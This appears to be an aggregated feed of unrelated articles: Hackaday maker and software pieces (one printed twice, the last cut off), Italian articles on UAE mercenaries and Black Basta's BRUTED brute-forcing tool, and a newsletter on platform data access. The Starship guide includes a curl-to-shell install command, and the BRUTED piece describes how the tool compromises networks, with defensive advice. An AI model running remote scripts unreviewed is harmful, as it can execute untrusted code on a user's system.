A Modern Take on the Etch A Sketch
The Etch A Sketch is a classic children’s toy resembling a picture frame where artwork can be made by turning two knobs attached to a stylus inside the frame. The stylus scrapes off an aluminum powder, creating the image which can then be erased by turning the frame upside down and shaking it, adding the powder back to the display. It’s completely offline and requires no batteries, but in our modern world those two things seem to be more requirements than when the Etch A Sketch was first produced in the 1960s. Enter the Tilt-A-Sketch, a modern version of the classic toy.
Rather than use aluminum powder for the display, the Tilt A Sketch replaces it with an LED matrix and removes the stylus completely. There are no knobs on this device to control the path of the LED either; a inertial measurement unit is able to sense the direction that the toy is tilted while a microcontroller uses that input to light up a series of LEDs corresponding to the direction of tilt. There are a few buttons on the side of the device as well which allow the colors displayed by the LEDs to change, and similar to the original toy the display can be reset by shaking.
The Tilt-A-Sketch was built by [devitoal] as part of an art display which allows the visitors to create their own art. Housed in a laser-cut wooden enclosure the toy does a faithful job of recreating the original. Perhaps unsurprisingly, the Etch A Sketch is a popular platform for various projects that we’ve seen before including original toys modified with robotics to create the artwork and electronic recreations that use LED displays instead in a way similar to this project.
youtube.com/embed/KoSKXEI5jus?…
Solar Power, Logically
We’ve all seen the ads. Some offer “free” solar panels. Others promise nearly free energy if you just purchase a solar — well, solar system doesn’t sound right — maybe… solar energy setup. Many of these plans are dubious at best. You pay for someone to mount solar panels on your house and then pay them for the electricity they generate at — presumably — a lower cost than your usual source of electricity. But what about just doing your own set up? Is it worth it? We can’t answer that, but [Brian Potter] can help you answer it for yourself.
In a recent post, he talks about the rise of solar power and how it is becoming a large part of the power generation landscape. Interestingly, he presents graphs of things like the cost per watt of solar panels adjusted for 2023 dollars. In 1975, a watt cost over $100. These days it is about $0.30. So the price isn’t what slows solar adoption.
The biggest problem is the intermittent nature of solar. But how bad is that really? It depends. If you can sell power back to the grid when you have it to spare and then buy it back later, that might make sense. But it is more effective to store what you make for your own use.
That, however, complicates things. If you really want to go off the grid, you need enough capacity to address your peak demand and enough storage to meet demand over several days to account for overcast days, for example.
There’s more to it than just that. Read the post for more details. But even if you don’t want solar, if you enjoy seeing data-driven analysis, there is plenty to like here.
Building an effective solar power system is within reach of nearly anyone these days. Some of the problems with solar go away when you put the cells in orbit. Of course, that always raises new problems.
Backyard Rope Tow from Spare Parts
A few years ago, [Jeremy Makes Things] built a rope tow in his back yard so his son could ski after school. Since the lifts at the local hill closed shortly after schools let out, this was the only practical way for his son to get a few laps in during the week. It’s cobbled together from things that [Jeremy] had around the house, and since the original build it’s sat outside for a few years without much use. There’s been a lot more snow where he lives this year though, so it’s time for a rebuild.
The power source for the rope tow is an old gas-powered snowblower motor, with a set of rollers and pulleys for the rope made out of the back end of a razor scooter. Some polyurethane was poured around the old wheel hub so that the rope would have something to grip onto. The motor needed some sprucing up as well, from carburetor adjustment, fuel tank repairs, and some other pieces of maintenance before it could run again. With that out of the way it could be hoisted back up a tree at the top of the hill and connected to the long rope.
This isn’t the first time [Jeremy] has had to perform major maintenance on this machine either. Three years ago it needed plenty of work especially around the polyurethane wheel where [Jeremy] also had to machine a new wheel bearing in addition to all the other work that had to go into repairing it that time. From the looks of things though it’s a big hit with his son who zips right back up the hill after each ski run. Getting to the tops of ski runs with minimal effort has been a challenge of skiers and snowboarders alike for as long as the sport has been around, and we’ve seen all kinds of unique solutions to that problem over the years.
Laser Harp Sets the Tone
In many ways, living here in the future is quite exiting. We have access to the world’s information instantaneously and can get plenty of exciting tools and hardware delivered to our homes in ways that people in the past with only a Sears catalog could only dream of. Lasers are of course among the exciting hardware available, which can be purchased with extremely high power levels. Provided the proper safety precautions are taken, that can lead to some interesting builds like this laser harp which uses a 3W laser for its strings.
[Cybercraftics]’ musical instrument is using a single laser to generate seven harp strings, using a fast stepper motor to rotate a mirror to precise locations, generating the effect via persistence of vision. Although he originally planned to use one Arduino for this project, the precise timing needed to keep the strings in the right place was getting corrupted by adding MIDI and the other musical parts to the project, so he split those out to a second Arduino.
Although his first prototype worked, he did have to experiment with the sensors used to detect his hand position on the instrument quite a bit before getting good results. This is where the higher power laser came into play, as the lower-powered ones weren’t quite bright enough. He also uses a pair of white gloves which help illuminate a blocked laser. With most of the issues ironed out, [Cybercraftics] notes that there’s room for improvement but still has a working instrument that seems like a blast to play. If you’re still stuck in the past without easy access to lasers, though, it’s worth noting that there are plenty of other ways to build futuristic instruments as well.
youtube.com/embed/c5HmCTt6hQ4?…
Contro i pirati e i cybercriminali gli Emirati mettono in campo i nuovi mercenari
Gli Emirati Arabi Uniti (EAU) costituiscono un caso unico nell’impiego dei mercenari, differenziandosi dalle esperienze in Angola, Sierra Leone e Nigeria sia per le motivazioni che per le modalità di utilizzo. Mentre in Africa il ricorso ai mercenari è spesso stato legato alla sopravvivenza di regimi fragili in contesti segnati da instabilità e conflitti interni, gli Emirati si distinguono per la loro stabilità politica e per la ricchezza derivante dal petrolio. Tuttavia, il Paese soffre di una carenza cronica di manodopera e competenze tecnologiche, soprattutto in ambito militare. Questa situazione ha spinto il Governo a utilizzare mercenari per colmare tali lacune, senza subire le stesse critiche internazionali che hanno colpito i Paesi africani. Ciò è attribuibile al peso geopolitico degli Emirati, le cui riserve petrolifere e ricchezze spingono le potenze occidentali a essere più prudenti nell’esprimere condanne, riservando critiche più severe a Stati più fragili e meno influenti.
Due approcci: sicurezza interna e politica estera
L’uso dei mercenari da parte degli Emirati si articola in due principali direttrici. La prima riguarda il rafforzamento della sicurezza interna, attraverso il supporto alle strutture che proteggono il regime. In particolare, i mercenari sono stati determinanti nella supervisione e creazione della Guardia Presidenziale, un corpo d’élite progettato per salvaguardare la leadership emiratina da eventuali colpi di Stato o minacce interne, spesso attribuite all’Iran. Questo utilizzo consente al Governo di affrontare in modo proattivo la sovversione interna e di consolidare la stabilità politica.
La seconda direttrice si riferisce al ruolo dei mercenari nella proiezione del potere emiratino oltre i confini nazionali, sfruttandoli come strumenti militari per perseguire obiettivi di politica estera. Gli Emirati, per esempio, sostengono Khalīfa Haftar e il suo Esercito Nazionale Libico attraverso finanziamenti e il dispiegamento del Gruppo Wagner. In Yemen, il coinvolgimento dei mercenari è stato altrettanto significativo: gli Emirati hanno utilizzato contractor per affiancare le loro truppe nella guerra contro gli Huthi, un conflitto condotto con il supporto di alleanze tribali locali. Per ridurre l’onere sulle proprie forze armate, gli Emirati hanno schierato circa 450 contractor latinoamericani su un totale di 1.800 uomini di stanza nella base di Abu Dhabi. Questo approccio riflette la volontà di un Governo determinato a difendere i propri interessi senza coinvolgere direttamente i propri cittadini nelle operazioni belliche.
I vantaggi della negabilità plausibile: il caso della Somalia
Un esempio emblematico di questa strategia è rappresentato dall’operazione anti-pirateria condotta nel Puntland, una regione somala. Gli Emirati, attraverso una sussidiaria della Reflex Ltd, una società originariamente legata a Erik Prince, finanziarono la Puntland Maritime Police Force (PMPF). Questa unità, composta da ex mercenari sudafricani e contractor locali, era incaricata di contrastare le attività dei pirati lungo le coste somale settentrionali. Equipaggiata con elicotteri, motoscafi e mezzi corazzati, la PMPF operava con un livello di aggressività superiore a quello tipico delle forze governative. Sebbene non sia confermato che abbia ingaggiato i pirati in scontri diretti, l’unità si è distinta per l’uso di forza letale in operazioni offensive, piuttosto che difensive.
Le Nazioni Unite hanno espresso preoccupazioni riguardo all’utilizzo dei mercenari sudafricani e ai metodi di addestramento della PMPF, ma gli Emirati hanno rivendicato il successo dell’operazione, che ha temporaneamente ridotto la minaccia della pirateria per le spedizioni internazionali. Tuttavia, quando la missione è divenuta di pubblico dominio, il Governo emiratino ha rapidamente chiuso il programma per evitare danni alla propria immagine internazionale, abbandonando la possibilità di sfruttare ulteriormente la negabilità plausibile.
Mercenari cibernetici: la strategia degli Emirati
Gli Emirati hanno anche investito massicciamente nel settore della cybersicurezza, utilizzando mercenari cibernetici per ampliare la propria influenza. Attraverso Darkmatter, una potente società locale, il Paese ha avviato operazioni mirate a rafforzare il controllo digitale sia a livello nazionale che internazionale. Un esempio significativo è il Project Rave, un programma che ha reclutato decine di ex agenti dell’intelligence americana per condurre operazioni di sorveglianza contro Governi stranieri, militanti e attivisti per i diritti umani.
Queste attività hanno generato tensioni con Paesi vicini come il Qatar, che ha accusato gli Emirati di aver hackerato agenzie di stampa e canali social ufficiali, riaprendo un’annosa faida tra le monarchie del Golfo. L’uso di contractor con competenze avanzate nel campo della cybersicurezza riflette l’importanza crescente di questa dimensione per un Paese piccolo come gli Emirati, che utilizza strumenti non convenzionali per competere in un’arena geopolitica sempre più complessa.
Chi è il mercenario del XXI secolo
Il ricorso ai mercenari da parte degli Emirati pone una domanda fondamentale: come definire il mercenario moderno? Gli esempi di EO in Angola e Sierra Leone, di STTEP in Nigeria e delle operazioni emiratine dimostrano che i mercenari, singoli o affiliati a società, sono strumenti geostrategici sempre più rilevanti. Questi attori operano senza legami con il loro Stato di origine, offrendo servizi di sicurezza offensiva e difensiva a governi che vogliono rafforzare il proprio potere senza implicazioni dirette.
Tuttavia, la legittimità di queste operazioni è spesso contestata. Gli Stati Uniti e il Regno Unito, per esempio, tendono a distinguere tra “contractor militari”, considerati legittimi, e “mercenari”, una categoria demonizzata per ragioni politiche. Questo doppio standard riflette l’interesse delle grandi potenze nel mantenere il controllo sulle dinamiche di sicurezza internazionale, proteggendo i propri interessi e delegittimando gli attori indipendenti.
Gli Emirati Arabi Uniti rappresentano un esempio lampante di come i piccoli Stati ricchi di risorse possano sfruttare i mercenari per espandere la propria influenza, sia a livello regionale che internazionale. Tuttavia, il ricorso a queste forze evidenzia anche un doppio standard nelle reazioni globali. Mentre i Paesi fragili che dipendono dai mercenari sono soggetti a severe critiche, gli Stati ricchi come gli Emirati ricevono un trattamento più indulgente, complice la loro importanza strategica.
Questa asimmetria riflette una dinamica geopolitica in cui le società mercenarie indipendenti hanno il potenziale di alterare profondamente lo status quo, soprattutto in regioni come l’Africa e il Medio Oriente. Sebbene l’uso dei mercenari sia visto come una soluzione pragmatica da parte di molti governi, esso solleva questioni etiche e politiche che rischiano di amplificare le tensioni internazionali e di alimentare nuove forme di neocolonialismo mascherato.
L'articolo Contro i pirati e i cybercriminali gli Emirati mettono in campo i nuovi mercenari proviene da InsideOver.
Three SPI Busses Are One Too Many on This Cheap Yellow Display
The Cheap Yellow Display may not be the fastest of ESP32 boards with its older model chip and 4 MB of memory, but its low price and useful array of on-board peripherals has made it something of a hit in our community. Getting the most out of the hardware still presents some pitfalls though, as [Mark Stevens] found out when using one for an environmental data logger. The problem was that display, touch sensor, and SD card had different SPI busses, of which the software would only recognise two. His solution involves a simple hardware mod, which may benefit many others doing similar work.
It’s simple enough, put the LCD and SD card on the same bus, retaining their individual chip select lines. There’s a track to be cut and a bit of wiring to be done, but nothing that should tax most readers too much. We’re pleased to see more work being done with this board, as it remains a promising platform, and any further advancements for it are a good thing. If you’re interested in giving it a go, then we’ve got some inspiration for you.
Linux Fu: A Warp Speed Prompt
If you spend a lot of time at the command line, you probably have either a very basic prompt or a complex, information-dense prompt. If you are in the former camp, or you just want to improve your shell prompt, have a look at Starship. It works on the most common shells on most operating systems, so you can use it everywhere you go, within reason. It has the advantage of being fast and you can also customize it all that you want.
What Does It Look Like?
It is hard to explain exactly what the Starship prompt looks like. First, you can customize it almost infinitely, so there’s that. Second, it adapts depending on where you are. So, for example, in a git-controlled directory, you get info about the git status unless you’ve turned that off. If you are in an ssh session, you’ll see different info than if you are logged in locally.
However, here’s a little animation from their site that will give you an idea of what you might expect:
hackaday.com/wp-content/upload…
Installation
The web site says you need a Nerd Font in your terminal. I didn’t remember doing that on purpose, but apparently I had one already.
Next, you just have to install using one of the methods they provide, which depends on your operating system. For Linux, you can run the installer:
curl -sS starship.rs/install.sh | sh
Sure, you should download it first and look to make sure it won’t reformat your hard drive or something, but it was fine when we did it.
Finally, you have to run an init command. How you do that depends on your shell and they have plenty of examples. There’s even a way to use it with cmd.exe on Windows!
Customization
The default isn’t bad but, of course, you are going to want to change things. Oddly, the system doesn’t create a default configuration file. It just behaves a certain way if it doesn’t find one. You must make your own ~/.config/starship.toml file. You can change where the file lives using an environment variable, if you prefer, but you still have to create it.
The TOML file format has sections like an INI file. Just be aware that any global options have to come before any section (that is, there’s no [global] tag). If you put things towards the bottom of the file, they won’t seem to work and it is because they have become part of the last tag.
There are a number of modules and each module reads data from a different section. For example, on my desktop I have no need for battery status so:
[battery]disabled = true
Strings
In the TOML file you can use single or double quotes. You can also triple a quote to make a string break lines (but the line breaks are not part of the string). The single quotes are treated as a literal, while double quotes require escape characters for special things.
You can use variables in strings like $version or $git_branch. You can also place part of a string in brackets and then formating for the string in parenthesis immediately following. For example:
'[off](fg:red bold)'
Finally, you can have a variable print only if it exists:
'(#$id)'
If $id is empty, this does nothing. Otherwise, it will print the # and the value.
Globals and Modules
You can find all the configuration options — and there are many — in the Starship documentation. Of primary interest is the global format variable. This sets each module that is available. However, you can also use $all to get all the otherwise unspecified modules. By default, the format variable starts with $username $hostname. Suppose you wanted it to be different. You could write:
format='$hostname ! $username $all'
You’ll find many modules that show the programming language used for this directory, version numbers, and cloud information. You can shut things off, change formatting, or rearrange. Some user-submitted customizations are available, too. Can’t find a module to do what you want? No problem.
Super Custom
I wanted to show the status of my watercooler, so I created a custom section in the TOML file:
[custom.temp]
command = 'temp-status|grep temp|cut -d " " -f 7'
when = true
format='$output°'
The command output winds up in, obviously, $output. In this case, I always want the module to output and the format entry prints the output with a degree symbol after it. Easy!
Of Course, There are Always Others
There are other prompt helpers out there, especially if you use zsh (e.g., Oh My Zsh). However, if you aren’t on zsh, your options are more limited. Oh My Posh is another cross-shell entry into the field. Of course, you don’t absolutely need any of these. They work because shells give you variables like PS1 and PROMPT_COMMAND, so you can always roll your own to be as simple or complex as you like. People have been doing their own for a very long time.
If you want to do your own for bash, you can get some help online. Or, you could add help to bash, too.
Social media is a black box. Here's how to fix that
THIS IS A BONUS EDITION OF DIGITAL POLITICS. I'm Mark Scott, and I don't usually speak about my day job in this newsletter. But today, that changes.
One of my goals this year is to help open up social media platforms to greater outside transparency. To do that, I'm working on ways to jumpstart data access to these platforms, or efforts to allow independent researchers to delve into the public data that these firms collect on all of us.
It's not an easy task — especially because any form of such data access must protect people's privacy, at all cost, and uphold the highest levels of security.
But, for me, it's a fundamental step in filling the democratic deficit associated with how social media may (or may not) affect our everyday lives.
Below gives you a glimpse about what I've been up to in recent months. It's a cross-post from Tech Policy Press.
Let's get started.
What happens online doesn't just stay online
IT'S HARD TO REMEMBER A WORLD WITHOUT SOCIAL MEDIA. From the United States to Brazil, people now spend hours on TikTok, Instagram, and YouTube each day, and these platforms have become embedded in everything from how we talk to friends and family to how we elect our national leaders.
But one thing is clear: despite researchers’ efforts to decipher social media’s impact, if any, on countries’ democratic institutions, no one still has a clear understanding of how these global platforms work. What’s worse — we have less awareness about what happens on these platforms in 2025 than we did five years ago.
This is a problem.
It’s a problem for those who believe these tech companies censor people’s voices online. It’s a problem for those who believe these firms do not do enough to police their platforms for harmful content. And it’s a problem for democratic countries whose political systems are fracturing under increased polarization — some of which is amplified via social media.
In 2025, there is a fundamental disconnect between what happens on social media and what academics, independent researchers and regulators understand about these platforms.
That has led to a democratic deficit. No one can quantify the effect, if any, of these platforms’ impact on public discourse. It has also led to a policymaking void. Lawmakers worldwide don’t know what steps are needed via potential new legislation, voluntary standards or the doubling down on existing efforts to reduce online harm on social media while upholding individuals’ right to free speech.
In short, we just don’t know enough about social media’s impact on society.
Thanks for reading Digital Politics. If you've been forwarded this newsletter (and like what you've read), please sign up here. For those already subscribed, reach out on digitalpolitics@protonmail.com
Without quantifiable evidence of harm (or lack of it) — driven by independent outside access to platform data, or the ability for people to research the inner workings of these social media giants — there is no way to make effective online safety legislation, uphold people’s freedom of expression, and hold companies to account when, inevitably, things go wrong.
And yet, there is a way forward. One that relies on the protection of people’s privacy and free speech. One that limits government access to people’s social media posts. And one that gives outside researchers the ability to kick the tires on how these platforms operate by granting them access to public data in ways that improves society’s understanding of these social media giants.
What are we going to do about it?
To meet this need, Columbia World Projects at Columbia University and the Hertie School’s Centre for Digital Governance have been running workshops with one aim in mind: How to build on emerging online safety regimes worldwide — some of which allow, or will soon allow, for such mandatory data access from the platforms to outside groups — to fill this democratic deficit.
With support from the Knight Foundation, that has involved bringing together groups of academic and civil society researchers, data infrastructure providers and national regulators for regular meetings to hash out what public and private funding is required to turn such data access from theory into reality.
The initial work has focused on the European Union’s Digital Services Act, which includes specific mandatory requirements for outsiders to delve into platform data.
But as other countries bring online similar data access regimes, the hope is to provide a route for others to follow that will build greater capacity for researchers to conduct this much-needed work; support regulators in navigating the inherent difficulties in opening up such platforms’ public data to outsiders; and ensure that people’s social media data is protected and secured, at all cost, from harm and surveillance.
As with all research, much relies on funding. Just because a country’s online safety laws dictate that outsiders can access social media data does not mean that researchers can just flick on a switch and get to work.
At every turn, there’s a need for greater public and private backing.
As part of the ongoing workshops, the discussions have focused on four areas where we believe targeted funding support from a variety of public and private donors can make the most impact. Taken together, it represents an essential investment in our wider understanding of social media that will ensure companies uphold their stated commitments to make their platforms accountable and transparent to outside scrutiny.
Four ways to make social media giants more accountable
The first component is the underlying infrastructure needed to carry out this work. Currently, accessing social media data is confined to the few, not the many. Researchers either need existing relationships with platforms or access to large funding pots to pay for cloud storage, technical analysis tools and other data access techniques that remain off limits to almost everyone.
Currently, there is a cottage industry of data providers — some commercial, others nonprofit — that provide the baseline infrastructure, in terms of access to platforms, analytics tooling and user-friendly research interfaces. Yet to meet researchers’ needs, as well as the growing regulatory push to open up social media giants to greater scrutiny, more needs to be done to make such infrastructure readily accessible, particularly to experts in Global Majority countries.
That includes scaling existing data infrastructure, making analytical tools more universally available to researchers, and using a variety of techniques — from using Application Programming Interfaces, or APIs, that plug directly into platform data to allowing researchers to scrape social media sites in the public interest to promoting “data donations” directly from users themselves — to meet different research needs.
The second focus has been on the relationships between researchers and regulators. As more countries pursue online safety legislation, there is a growing gap between in-house regulatory capacity and outsider expertise that needs to be closed for these regimes to operate effectively. Yet currently, few, if any, formal structures exist for researchers and regulators to share best practices — all while maintaining a safe distance via so-called “Chinese Walls” between government oversight and researcher independence.
What is needed are more formal information-sharing opportunities between regulators and researchers so that online safety regimes are based on quantifiable evidence — often derived from outside data access to social media platforms. That may include regular paid-for secondments for researchers to embed inside regulators to share their knowledge; the development of routine capacity building and information sharing to understand the evolving research landscape; and a shift away from informal networks between some researchers and regulators into a more transparent system that is open to all.
Sign up for Digital Politics
Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.
Subscribe
Email sent! Check your inbox to complete your signup.
No spam. Unsubscribe anytime.
For that to work, a third element is needed in terms of greater capacity building — in the form of technical assistance, data protection and security training and researcher community engagement. Currently, outside experts have varying levels of technical understanding, policy expertise and knowledge of privacy standards that hamstring greater accountability and transparency for platforms. If people’s public social media data is not secured and protected against harm, for instance, then companies will rightly restrict access to safeguard their users from Cambridge Analytica-style leakages of information.
What is needed is the expansion of existing research networks so that data access best practices can be shared with as many groups as possible. Technical support to maintain the highest data protection standards — in the form of regular training of researchers and the development of world-leading privacy protocols for all to use — similarly will provide greater legal certainty for social media users. The regular convening of researchers so that people can learn from each other about the most effective, and secure, way to conduct such research will also democratize current data access that has often been limited to a small number of experts.
The fourth component of the workshops is the most important: how to maintain independence between outside researchers and regulators in charge of the growing number of online safety regimes worldwide. It is important for both sides to work effectively with each other. But neither researchers nor regulators should become beholden — or perceived to be beholden — to each other. Independence for regulators to conduct their oversight and for researchers to criticize these agencies is a fundamental part of how democracies function.
That will require forms of public-private funding to support ongoing data access work to create strict safeguards between researchers and regulators. That’s a tricky balance between supporting close ties between officials and outsiders, while similarly ensuring that neither side feels subordinate to the other. To meet that balance, a mixture of hands-off public support and non-government funding will be critical.
Such structures already exist in other industries, most notably in the medical research field. They represent a clear opportunity to learn from others as outside researchers and regulators push for greater accountability and transparency for social media companies.
Chemistry Meets Mechatronics in This Engaging Art Piece
There’s a classic grade school science experiment that involves extracting juice from red cabbage leaves and using it as a pH indicator. It relies on anthocyanins, pigmented compounds that give the cabbage its vibrant color but can change depending on the acidity of the environment they’re in, from pink in acidic conditions to green at higher pH. And anthocyanins are exactly what power this unusual kinetic art piece.
Even before it goes into action, [Nathalie Gebert]’s Anthofluid is pretty cool to look at. The “canvas” of the piece is a thin chamber formed by plexiglass sheets, one of which is perforated by an array of electrodes. A quartet of peristaltic pumps fills the chamber with a solution of red cabbage juice from a large reservoir, itself a mesmerizing process as the purple fluid meanders between the walls of the chamber and snakes around and between the electrodes. Once the chamber is full, an X-Y gantry behind the rear wall moves to a random set of electrodes, deploying a pair of conductors to complete the circuit. When a current is applied, tendrils of green and red appear, not by a pH change but rather by the oxidation and reduction reactions occurring at the positive and negative electrodes. The colors gently waft up through the pale purple solution before fading away into nothingness. Check out the video below for the very cool results.
We find Anthofluid terribly creative, especially in the use of such an unusual medium as red cabbage juice. We also appreciate the collision of chemistry, electricity, and mechatronics to make a piece of art that’s so kinetic but also so relaxing at the same time. It’s the same feeling that [Nathalie]’s previous art piece gave us as it created images on screens of moving thread.
youtube.com/embed/sC4Rg1wRP68?…
PiEEG Kit is a Self-Contained Biosignal Labratory
Back in 2023, we first brought you word of the PiEEG: a low-cost Raspberry Pi based device designed for detecting and analyzing electroencephalogram (EEG) and other biosignals for the purposes of experimenting with brain-computer interfaces. Developed by [Ildar Rakhmatulin], the hardware has gone through several revisions since then, with this latest incarnation promising to be the most versatile and complete take on the concept yet.
At the core of the project is the PiEEG board itself, which attaches to the Raspberry Pi and allows the single-board computer (SBC) to interface with the necessary electrodes. For safety, the PiEEG and Pi need to remain electrically isolated, so they would have to be powered by a battery. This is no problem while capturing data, as the Pi has enough power to process the incoming signals using the included Python tools, but could be an issue if you wanted to connect the PiEEG system to another computer, say.
For the new PiEEG Kit, the hardware is now enclosed in its own ABS carrying case, which includes an LCD right in the lid. While you’ve still got to provide your own power (such as a USB battery bank), having the on-board display removes the need to connect the Pi to some other system to visualize the data. There’s also a new PCB that allows the connection of additional environmental sensors, breakouts for I2C, SPI, and GPIO, three buttons for user interaction, and an interface for connecting the electrodes that indicates where they should be placed on the body right on the silkscreen.
The crowdsourcing campaign for the PiEEG Kit is set to begin shortly, and the earlier PiEEG-16 hardware is available for purchase currently if you don’t need the fancy new features. Given the fact that the original PiEEG was funded beyond 500% during its campaign in 2023, we imagine there’s going to be plenty of interest in the latest-and-greatest version of this fascinating project.
youtube.com/embed/vVgMHCaZgIQ?…
PiEEG Kit is a Self-Contained Biosignal Laboratory
Back in 2023, we first brought you word of the PiEEG: a low-cost Raspberry Pi based device designed for detecting and analyzing electroencephalogram (EEG) and other biosignals for the purposes of experimenting with brain-computer interfaces. Developed by [Ildar Rakhmatulin], the hardware has gone through several revisions since then, with this latest incarnation promising to be the most versatile and complete take on the concept yet.
At the core of the project is the PiEEG board itself, which attaches to the Raspberry Pi and allows the single-board computer (SBC) to interface with the necessary electrodes. For safety, the PiEEG and Pi need to remain electrically isolated, so they would have to be powered by a battery. This is no problem while capturing data, as the Pi has enough power to process the incoming signals using the included Python tools, but could be an issue if you wanted to connect the PiEEG system to another computer, say.
For the new PiEEG Kit, the hardware is now enclosed in its own ABS carrying case, which includes an LCD right in the lid. While you’ve still got to provide your own power (such as a USB battery bank), having the on-board display removes the need to connect the Pi to some other system to visualize the data. There’s also a new PCB that allows the connection of additional environmental sensors, breakouts for I2C, SPI, and GPIO, three buttons for user interaction, and an interface for connecting the electrodes that indicates where they should be placed on the body right on the silkscreen.
The crowdsourcing campaign for the PiEEG Kit is set to begin shortly, and the earlier PiEEG-16 hardware is available for purchase currently if you don’t need the fancy new features. Given the fact that the original PiEEG was funded beyond 500% during its campaign in 2023, we imagine there’s going to be plenty of interest in the latest-and-greatest version of this fascinating project.
youtube.com/embed/vVgMHCaZgIQ?…
BRUTED: Il Tool di Black Basta che Apre le Porte ai Ransomware
Nel contesto della cybersecurity, l’evoluzione delle minacce legate ai ransomware continua a rappresentare una delle sfide più complesse per le aziende e gli esperti di sicurezza. Uno dei gruppi più attivi e pericolosi del panorama attuale è Black Basta, che dal 2022 ha affermato la sua presenza nel settore del crimine informatico attraverso attacchi mirati a infrastrutture aziendali critiche. La sua peculiarità non risiede solo nell’uso del modello Ransomware-as-a-Service (RaaS), ma anche nell’adozione di strumenti sofisticati per il compromissione iniziale dei sistemi bersaglio.
Uno di questi strumenti è BRUTED, un framework automatizzato di brute forcing e credential stuffing, progettato per compromettere dispositivi di rete periferici esposti su Internet, come firewall, VPN e altri servizi di accesso remoto. La sua efficienza e capacità di adattamento lo rendono un’arma particolarmente insidiosa nelle mani di cybercriminali esperti.
Questa analisi approfondisce il funzionamento di BRUTED, il modus operandi di Black Basta e le implicazioni per la sicurezza informatica.
Black Basta: Un’Organizzazione Cybercriminale in Crescita
Black Basta si è imposto come uno dei gruppi ransomware più attivi e letali degli ultimi anni. Operando come Ransomware-as-a-Service (RaaS), offre agli affiliati strumenti per eseguire attacchi altamente mirati, condividendo con essi una parte dei profitti derivanti dai riscatti. Le principali caratteristiche della loro strategia includono:
- Doppia Estorsione: Dopo aver criptato i dati della vittima, il gruppo minaccia la pubblicazione delle informazioni rubate, aumentando la pressione per ottenere il pagamento.
- Targetizzazione di Settori Critici: I settori più colpiti dagli attacchi di Black Basta includono:
- Servizi aziendali (Business Services), per il loro elevato valore commerciale.
- Industria manifatturiera (Manufacturing), dove l’interruzione operativa può causare perdite economiche enormi.
- Infrastrutture critiche, spesso caratterizzate da scarsa resilienza agli attacchi cyber.
- Utilizzo di strumenti avanzati come Cobalt Strike, Brute Ratel e, più recentemente, BRUTED, per massimizzare l’efficacia degli attacchi.
L’introduzione di BRUTED ha permesso a Black Basta di automatizzare e scalare gli attacchi di accesso iniziale, rendendo ancora più difficile per le aziende difendersi.
BRUTED: Come Funziona e Quali Sono i Suoi Obiettivi?
BRUTED è un framework di attacco altamente avanzato che automatizza il processo di brute forcing e credential stuffing. Il suo scopo principale è quello di individuare dispositivi di rete vulnerabili e ottenere l’accesso iniziale ai sistemi aziendali.
Le sue principali funzionalità includono:
- Scansione automatizzata di Internet per identificare dispositivi esposti e potenzialmente vulnerabili.
- Tentativi di accesso tramite brute force sfruttando database di credenziali rubate o deboli.
- Adattabilità multi-vendor, con supporto specifico per diversi tipi di firewall, VPN e gateway di accesso remoto.
- Persistenza e movimento laterale, facilitando l’accesso ai sistemi interni una volta compromesso il perimetro di sicurezza.
Una volta ottenuto l’accesso iniziale, gli attaccanti sfruttano il framework per:
- Compromettere dispositivi chiave come firewall e VPN.
- Eseguire movimenti laterali all’interno della rete per ottenere privilegi più elevati.
- Distribuire il ransomware Black Basta, crittografando sistemi critici e bloccando l’operatività aziendale.
BRUTED rappresenta quindi un passo in avanti nell’automazione degli attacchi, permettendo agli affiliati di Black Basta di operare con maggiore efficienza e su scala più ampia.
Analisi della Mappa di Attacco: Una Visione Dettagliata
L’immagine allegata fornisce una rappresentazione grafica estremamente dettagliata dell’infrastruttura di attacco basata su BRUTED e utilizzata da Black Basta. Analizzandola, emergono diversi livelli chiave dell’operazione:
1. Origine dell’Attacco (Lato Sinistro)
- Connessioni con la Russia: L’immagine suggerisce un legame con attori malevoli operanti dalla Federazione Russa.
- Settori maggiormente colpiti: Business Services e Manufacturing risultano tra i principali obiettivi.
- Strumenti di attacco: Oltre a BRUTED, vengono utilizzati strumenti di post-exploitation come Cobalt Strike e Brute Ratel.
2. Host Compromessi e Tecniche di Attacco (Centro)
- Il cluster centrale dell’immagine mostra un insieme di dispositivi esposti su Internet.
- Ogni nodo rappresenta un host vulnerabile, probabilmente identificato tramite scansioni automatizzate.
- Le connessioni tra i nodi indicano attacchi mirati, con utilizzo di brute force e credential stuffing su larga scala.
3. Indicatori di Compromissione (Lato Destro)
- L’elenco di domini e IP compromessi mostra le infrastrutture usate da Black Basta per il comando e controllo (C2).
- I colori distinti rappresentano il livello di criticità e l’associazione con specifici attacchi.
- IP e DNS evidenziati in rosso corrispondono a infrastrutture attualmente attive e pericolose.
Questa analisi grafica fornisce un quadro chiaro delle tecniche di attacco e permette agli esperti di cybersecurity di identificare gli indicatori chiave di compromissione (IoC).
Come Difendersi da BRUTED e Black Basta
Per mitigare il rischio di compromissione da parte di BRUTED e Black Basta, le aziende devono adottare strategie di sicurezza avanzate, tra cui:
- Protezione degli Endpoint di Rete:
- Bloccare l’accesso remoto non necessario.
- Configurare firewall per limitare accessi sospetti.
- Gestione Sicura delle Credenziali:
- Forzare l’uso dell’autenticazione multi-fattore (MFA).
- Evitare il riutilizzo di password deboli.
- Monitoraggio Attivo degli Indicatori di Compromissione:
- Aggiornare costantemente le blacklist di IP e domini malevoli.
- Analizzare tentativi di accesso anomali e bloccare gli indirizzi sospetti.
- Patch Management:
- Mantenere aggiornati firmware e software di firewall e VPN.
- Applicare patch di sicurezza contro vulnerabilità note.
L’integrazione di BRUTED nel modello di attacco di Black Basta rappresenta un’evoluzione nella criminalità informatica, aumentando la velocità e la scalabilità degli attacchi. Le aziende devono adottare misure proattive e strategie difensive solide per contrastare questa minaccia in crescita.
Un approccio basato su zero-trust, MFA e monitoraggio attivo è fondamentale per difendersi efficacemente da queste minacce in continua evoluzione.
L'articolo BRUTED: Il Tool di Black Basta che Apre le Porte ai Ransomware proviene da il blog della sicurezza informatica.
World’s Smallest Blinky, Now Even Smaller
Here at Hackaday, it’s a pretty safe bet that putting “World’s smallest” in the title of an article will instantly attract comments claiming that someone else built a far smaller version of the same thing. But that’s OK, because if there’s something smaller than this nearly microscopic LED blinky build, we definitely want to know about it.
